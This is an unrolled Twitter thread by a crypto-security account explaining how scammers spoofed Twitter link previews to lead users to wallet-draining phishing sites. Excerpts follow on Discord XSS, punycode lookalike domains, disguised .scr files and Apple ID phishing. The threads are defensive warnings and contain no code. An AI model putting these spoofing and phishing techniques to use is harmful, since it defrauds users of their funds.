Share this page!

Enter URL or ID to Unroll

You can paste full URL like: https://x.com/threadreaderapp/status/1644127596119195649
or just the ID like: 1644127596119195649

How to get URL link on X (Twitter) App

  1. On the Twitter thread, click on or icon on the bottom
  2. Click again on or Share Via icon
  3. Click on Copy Link to Tweet
  4. Paste it above and click "Unroll Thread"!
  5. More info at Twitter Help
Serpent Profile picture
@Serpent
Apr 14, 2023 β€’ 9 tweets β€’ 4 min read β€’ Read on X
Scrolly
🚨 TWITTER URL SPOOFING EXPLOIT 🚨

Scammers are exploiting a flaw with Twitter's website preview cards to show a legitimate website but have it redirect you to a phishing site.

Here's how it's currently being exploited to drain wallets πŸ§΅πŸ‘‡ Image
1/ There is an ongoing exploit that allows people to spoof what the Twitter website preview shows. It can be manipulated to show any website's preview, and take you somewhere completely different.

This is possible in both tweets & DMs.
2/ Recently, using a network of hacked accounts, attackers mass tweeted claiming that Uniswap was hacked, and they were able to get the hashtags #UniswapHack #UniswapExploit and "Revoke Cash" trending ImageImage
3/ After clicking on any of the trending terms, you'll find that the top tweets are fake tweets by accounts impersonating known web3 security accounts.

They bot the engagement to get it to the top of the search. ImageImage
4/ When you click the links, it will redirect you to replica phishing sites. After you connect your wallet, it will find your most valuable assets and prompt transactions that will drain your wallet. Image
5/ They're taking advantage of the recent SushiSwap exploit, hoping people will see #UniswapHack trending, see top security accounts posting about it with links that seem to be legit, and go on the websites to 'protect their assets', but it is all fabricated by scammers.
6/ There have also been other cases of this exploit, where scammers have spoofed website links in DMs during NFT trades, or announced fake airdrops/raffles with legitimate looking links. Image
7/ Does this link look legit to you? It shows OpenSea's website preview, but will it actually take you there? Test it out for yourself.

api.harrydenley.com/link_forwarder…
8/ Things to learn ✍️
- Don't trust what Twitter previews show.
- Always confirm authenticity. Double check usernames & URLs
- Understand what you're signing
- Hold your valuable assets on a hardware wallet

Stay safe & feel free to share this thread to educate others ❀️

β€’ β€’ β€’

Missing some Tweet in this thread? You can try to force a refresh
γ€€

Keep Current with Serpent

Serpent Profile picture

Stay in touch and get notified when new unrolls are available from this author!

Read all threads

This Thread may be Removed Anytime!

PDF

Twitter may remove this content at anytime! Save it as PDF for later use!

Try unrolling a thread yourself!

how to unroll video
  1. Follow @ThreadReaderApp to mention us!

  2. From a Twitter thread mention us with a keyword "unroll"
@threadreaderapp unroll

Practice here first or read more on our help page!

More from @Serpent

Serpent Profile picture
Dec 17, 2022
🚨 Analysis of how a scammer stole 14 BAYCs worth over 852 ETH ($1.07 million) today through a month-long social engineering scam.

Here's how it happened πŸ§΅πŸ‘‡
1/ The scammer (@JasonBrubeck) contacted the victim (@_sevenseason_) and asked to license IP rights for BAYC #2060. They claimed to be a casting director working for "Forte Pictures" which is an LA based Emmy award winning company with offices at Sony Pictures Studio.
2/ The alias "Jason Brubeck" is fake and does not exist, however, Forte Pictures and Marcus Mizelle are both real and legitimate. The real Forte Pictures company did not own the domain forte(.)pictures, but rather operated under Mizelle's website, marcusmizelle(.)com.
Read 12 tweets
Serpent Profile picture
Dec 15, 2022
🚨 CRITICAL DISCORD EXPLOIT 🚨

A few days ago, a dangerous Discord XSS exploit was found and exploited. This allowed hackers to steal your Discord token from clicking on an official Discord link.

Here's how it worked πŸ§΅πŸ‘‡
1/ For those who don't know, cross-site scripting (XSS) is an attack vector in which the attacker injects malicious executable scripts onto a vulnerable website.
2/ Discord's newly released discovery page allowed for an XSS exploit through HTML code injection. Hackers created a Discord server discovery page and put malicious code in the "Reasons to join" section. This is the HTML code hackers put on the page.
Read 7 tweets
Serpent Profile picture
Aug 21, 2022
🚨 CURRENTLY RUNNING TWITTER SCAMS 🚨

In this thread I've compiled a list of the most popular currently running crypto/NFT scams on Twitter.

Here's how they work πŸ§΅πŸ‘‡
🚩🚩 UNICODE LETTERS 🚩🚩

Scammers have started spoofing URLs using lookalike
unicode letters

In this case, they are changing the letter "i" to a lookalike character from a non-English alphabet

The URLs respectively resolve to:
β€’ xn--premnt-s9a[.]xyz
β€’ xn--premnt-zva[.]xyz ImageImage
On the phishing website, you will be met with a replica site of @PREMINT_NFT

When you click "Login To Register", depending on your total NFT collection value and your wallet balance, it will send either a Seaport signature which will drain your NFTs or attempt to drain your ETH. ImageImageImage
Read 19 tweets
Serpent Profile picture
Jun 25, 2022
🚨 FAKE FILE EXTENSION SCAM 🚨

Scammers are spoofing file extensions to disguise malicious files as PDFs and targeting artists, influencers, and projects.

This is how it works πŸ§΅πŸ‘‡ Image
1/ In this case, artist @RabbitinM was first messaged about a commission for his art. He was sent a zip file containing what the customer wanted, with examples and sketches. What seemed to a normal commission turned bad when the artist went to view the customer's request. ImageImageImageImage
2/ After opening the zip file, we can see example art, along with the PDF file containing the customer's sketches, however, this isn't a regular PDF file. It is actually a Screen Saver (.scr) file, which is an executable script, disguised as a PDF file. ImageImage
Read 12 tweets
Serpent Profile picture
May 10, 2022
Using an exploit with Google ads, scammers are able to make the real and scam URL look exactly the same.

Already ~100 ETH stolen πŸ§΅πŸ‘‡ Image
1/ After clicking the top link, you will be redirected to one of these phishing sites. On the phishing websites, they have two types of scams going on.

One will try to get your seed phrase, and the other one calls a Refund() method and attempts to drain your wallet balance. ImageImageImageImage
2/ How do you prevent this?
- ALWAYS make sure you're on the right URL at all times
- Never confirm random transactions. Always be cautious.
- Never give out your seed phrase.
- Stole your valuables on a cold wallet
Read 11 tweets
Serpent Profile picture
Apr 17, 2022
🚨 NEW PHISHING SCAM 🚨

Already $650,000 stolen from a single individual and it's going to happen to a lot more people.

This is how it happened πŸ§΅πŸ‘‡
1/ On April 15th, @revive_dom received multiple text messages asking to reset his Apple ID password and at 6:32 PM he received a call from "Apple Inc." which was a spoofed caller ID.

They claimed that there was suspicious activity on his Apple ID and they asked for a one-time ImageImage
2/ verification code to prove the owner of the Apple ID account. After giving the 6 digit verification code, the scammers hung up and his MetaMask wallet was wiped, with over $650,000 stolen. How did they access his MetaMask wallet? Let's look into what happened πŸ‘‡ ImageImageImage
Read 9 tweets

Did Thread Reader help you today?

Support us! We are indie developers!

This site is made by just two indie developers on a laptop doing marketing, support and development! Read more about the story.

Become a Premium Member ($3/month or $30/year) and get exclusive features!

Become Premium

Don't want to be a Premium member but still want to support us?

Make a small donation by buying us coffee ($5) or help with server cost ($10)

Donate via Paypal

Or Donate anonymously using crypto!

Ethereum

0xfe58350B80634f60Fa6Dc149a72b4DFbc17D341E copy

Bitcoin

3ATGMxNzCUFzxpMCHL5sWSt4DVtS8UqXpi copy

Thank you for your support!

Follow Us!

Send Email!

:(